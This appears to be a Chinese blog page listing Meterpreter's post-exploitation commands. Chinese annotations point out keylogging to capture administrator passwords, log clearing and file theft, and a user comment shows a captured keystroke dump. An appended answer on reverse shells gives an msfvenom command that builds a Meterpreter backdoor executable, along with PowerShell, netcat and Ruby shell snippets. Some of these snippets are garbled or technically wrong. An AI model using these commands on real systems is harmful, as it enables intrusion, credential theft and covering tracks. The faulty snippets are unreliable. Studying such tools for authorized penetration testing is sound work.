meterpreter 内置工具

meterpreter > ?

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    info          Displays information about a Post module
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    load          Load one or more meterpreter extensions
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    resource      Run the commands stored in a file
    run           Executes a meterpreter script or Post module
    use           Deprecated alias for 'load'
    write         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory     从被溢出的主机上下载文件
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory     上传文件到被溢出主机


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log            清除日志
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      List all privileges available to the current process
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell   切换到OS shell环境,执行主机命令
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer       这3个用户记录键盘输入,可以记录管理员登陆密码等
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes

    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description

网友评论
  • 回复 1pilove3102011-04-19 16:31
    meterpreter > migrate 672
    [*] Migrating to 672...
    [*] Migration completed successfully.
    meterpreter > getpid
    Current pid: 672
    meterpreter > keyscan_start 
    Starting the keystroke sniffer...
    meterpreter > keyscan_dump  
    Dumping captured keystrokes...
     <Delete> this is lover <Return> i love my firens <Back>  <Back> dnds <Return> hah  <Ctrl>  <LCtrl> s
    meterpreter > keyscan_stop 
    Stopping the keystroke sniffer...
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反弹Shell是一种特殊的网络技术,允许攻击者通过网络与受害主机之间建立间接的远程连接,进而获得对该主机的完全控制权。这种技术常被黑客利用来进行持续监控、恶意软件部署、数据窃取等活动。以下是几种常用的反弹Shell工具: 1. **msfvenom (Metasploit Framework)**: Metasploit是一个强大的渗透测试框架,包含了多种攻击模块,其中包含用于生成反弹Shell的payloads。用户可以根据目标操作系统和所需执行的任务选择合适的payload。 ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -b "\x00-\xff" -f exe > backdoor.exe ``` 这条命令将生成一个Windows平台的反弹Meterpreter Shell。 2. **PowerShell**: Windows系统内置的强大脚本语言,支持复杂的任务自动化。用于构建反弹Shell时,可以结合PowerShell IEX函数或Invoke-Expression命令将远程代码注入到目标机器上执行。 ```powershell $client = New-Object System.Net.Sockets.TcpClient ("192.168.0.2", 4444) $stream = $client.GetStream() $stream.Write([text.encoding]::ASCII.GetBytes("Hello, World!"), 0, "Hello, World!" | Measure-Object).Count ``` 3. **Netcat (nc) 和类似工具**: Netcat是最常见的用于网络通信的小型实用程序之一,可以用于监听端口接收连接,也可以作为客户端发起连接,将数据作为Shell命令执行。 ``` nc -nvlp 4444 & telnet 192.168.0.2 4444 ``` 首条命令在本地运行一个监听4444端口的nc服务,第二条命令则是尝试从其他机器通过telnet连接到该端口,此时可以将返回的数据视为输入命令。 4. **Ruby**: 使用Ruby语言编写脚本来执行反弹Shell。Ruby拥有强大的字符串和进程管理能力,易于快速构建复杂的反弹Shell脚本。 示例代码片段: ```ruby require 'socket' s = TCPServer.open(4444) c, addr = s.accept print c.gets.chomp loop do cmd = c.gets.chomp c.puts `#{cmd}` end ``` 以上工具和方法都涉及到网络安全的风险评估与责任意识。在非授权的情况下使用此类技术属于非法入侵行为,违反法律法规。仅限于合法的安全审计或渗透测试环境内进行学习与研究用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值